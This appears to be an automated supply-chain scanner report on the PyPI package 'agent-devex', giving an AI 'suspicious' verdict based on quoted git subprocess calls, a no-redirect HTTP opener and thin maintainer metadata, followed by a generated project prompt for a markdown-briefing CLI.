agent-devex

v0.29.1 suspicious
4.0
Medium Risk

Agent-operated developer-experience CLI — deterministic per-backend markdown briefings for autonomous agents.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package shows moderate risks related to network and shell interactions, which could potentially be exploited. However, there are no signs of obfuscation or credential harvesting, reducing the immediate threat level.

  • Moderate network risk due to potential HTTP request behavior that may bypass redirects.
  • High shell risk due to interaction with system commands like 'git' without clear sanitization.
Per-check LLM notes
  • Network: The network pattern suggests the package might be designed to make HTTP requests without following redirects, which could be legitimate but also suspicious if the intent is to bypass security controls.
  • Shell: The shell execution patterns indicate the package interacts with system commands like 'git', which can be risky if not properly sanitized, potentially allowing for unauthorized command execution.
  • Obfuscation: No obfuscation patterns detected, indicating low risk.
  • Credentials: No credential harvesting patterns detected, indicating low risk.
  • Metadata: The author has only one package and lacks PyPI classifiers, suggesting low effort or a new/inactive account.

🔬 Heuristic Checks

Outbound Network Calls score 4.5

Found 3 network call pattern(s)

  • d) class _NoRedirectHandler(urllib.request.HTTPRedirectHandler): """Refuse to follow redirects.
  • h our refusing one. _OPENER = urllib.request.build_opener(_NoRedirectHandler) def is_discord_url(url: s
  • encode("utf-8") req = urllib.request.Request( url, data=body,
Code Obfuscation

No obfuscation patterns detected

Shell / Subprocess Execution score 10.0

Found 6 shell execution pattern(s)

  • trusted input. proc = subprocess.Popen( # nosec B603 argv, cwd=str(cwd),
  • t. """ paths_staged = subprocess.run( ["git", "diff", "--staged", "--name-only"],
  • tlines() paths_unstaged = subprocess.run( ["git", "diff", "--name-only"], capture_out
  • s = last_read["ts"] out = subprocess.run( ["git", "log", f"--since={ts}", "--pretty=%H"],
  • ro exit. """ result = subprocess.run( # nosec B603 - args are constructed from typed callers
  • clearly. """ result = subprocess.run( # nosec B603 - fixed argv, no user input ["git", "
Credential Harvesting

No credential harvesting patterns detected

Typosquatting

No typosquatting candidates detected

Registered Email Domain

No author email provided

Suspicious Page Links

All external links appear legitimate

Git Repository History

Repository agentculture/devex appears legitimate

Maintainer History score 4.0

2 maintainer concern(s) found

  • Author "Ori Nachum" appears to have only 1 package on PyPI (new or inactive account)
  • Package has no PyPI classifiers (low effort / metadata quality)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with agent-devex 
Create a mini-application called 'DevBrief' that leverages the 'agent-devex' package to generate detailed, backend-specific documentation for developers. This tool will allow developers to input their backend technology stack (e.g., Django, Flask, Node.js) and receive a comprehensive markdown briefing tailored to that specific tech stack. The briefing should include setup instructions, common pitfalls, best practices, and useful resources.

Steps to implement:
1. Install the 'agent-devex' package.
2. Develop a user-friendly CLI interface where users can select their backend framework from a predefined list.
3. Utilize the 'agent-devex' package to generate a markdown file containing all necessary information for the selected backend.
4. Implement functionality to save the generated markdown file locally or directly open it in a markdown viewer.
5. Add error handling for cases where the specified backend is not supported by 'agent-devex'.
6. Optionally, integrate a feature that allows users to customize certain sections of the briefing (e.g., adding personal notes).

Features:
- User-friendly command-line interface for selecting backend frameworks.
- Generation of detailed markdown briefings based on the selected backend.
- Saving and viewing options for the generated markdown files.
- Error handling for unsupported backends.
- Optional customization options for briefing content.

Utilization of 'agent-devex':
- Use 'agent-devex' to query the appropriate backend-specific information and format it into a markdown document.
- Ensure that the generated briefings are deterministic, meaning they provide consistent information each time the same backend is queried.